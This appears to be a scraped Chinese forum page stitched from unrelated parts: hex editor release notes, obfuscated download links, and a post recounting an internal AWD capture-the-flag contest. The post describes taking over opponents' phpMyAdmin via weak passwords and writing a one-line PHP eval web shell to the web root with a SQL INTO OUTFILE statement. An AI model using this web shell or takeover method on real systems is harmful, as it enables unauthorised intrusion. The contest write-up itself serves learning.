版本：v1.6.1

更新日期：2021年1月11日

下载地址：4c2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6i4k6i4u0i4L8$3I4$3i4K6u0r3d9h3#2t1k6i4S2Q4x3V1k6J5k6h3I4W2j5i4y4W2M7#2)9J5c8R3`.`.

更新信息：

Additions

• Added a MSI installer for Windows
• Thanks a lot to @roblabla for his work on this!
• Added a console to the pattern window to show evaluator infos, warnings and errors
• Added assert, warnAssert and print builtin functions
• Added a right click context menu to the Hex editor window
• Added engineering display mode to Calculator
• Various UI improvements

Bug fixes

• Fixed findSequence builtin function not working correctly
• Thanks to @kaero
• Fixed issues with bitfields, enums and unions
• Fixed a bunch of crashes when using the pattern language
• Fixed invalid display of 64 bit values in the pattern data window
• Fixed bitfield entries displaying an invalid type
• Fixed empty structs displaying a wrong offset
• Fixed a off-by-one error that prevented arrays from going to the end of the data
• Fixed boolean OR operator not working at all
• Fixed applying of defines
• Improved UTF-8 display in data inspector
• Various cmake improvements

Hacking a Harley's Tuner - Part 2

1d4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6@1K9r3g2J5k6h3q4D9N6h3&6A6j5$3!0J5L8Y4y4W2j5%4g2J5K9i4c8&6i4K6u0W2k6$3W2@1K9s2g2T1i4K6u0W2K9h3!0Q4x3V1k6b7L8%4N6W2M7Y4k6A6M7$3W2G2L8W2)9J5k6o6u0Q4x3V1j5`.

本地html备份

本地html离线备份

下载连接请见附件

祝看雪论坛21岁生日快乐

自身情况：

接触过web渗透与软件逆向，但还未曾系统接触过CTF，只是上周有幸参与了公司内部组织的AWD比赛。

兴趣因素：

上周公司内部组织了一场AWD比赛，有幸获得第一名(通过取巧利用phpmyadmin弱口令登录对手后台，并修改密码使其他队伍无法利用，执行sql上传webshell，之后刷flag）感觉还是挺有意思的,故想通过《CTF竞赛权威指南（Pwn篇）(博文视点出品)》这本书了解下CTF，并根据此书为入口系统的学习下CTF-Pwn方向，希望可以有收获。

展示：

组内职责分配：我为攻击手，故我就不介绍防守的事情了

• 弱口令登录并修改密码使其它队伍无法利用

• 利用后台自身sql功能上传webshell

SELECT '<?php @eval($_POST[pass]);?>'
INTO OUTFILE '/var/www/html/tesaa.php'

• 上传成功

• 利用上传的shell成功链接

• 找到flag保存目录刷flag

在此感谢：

• 作者写出此书

• 博文视点提供此次抽奖机会

本地内容备份

请见附件html文件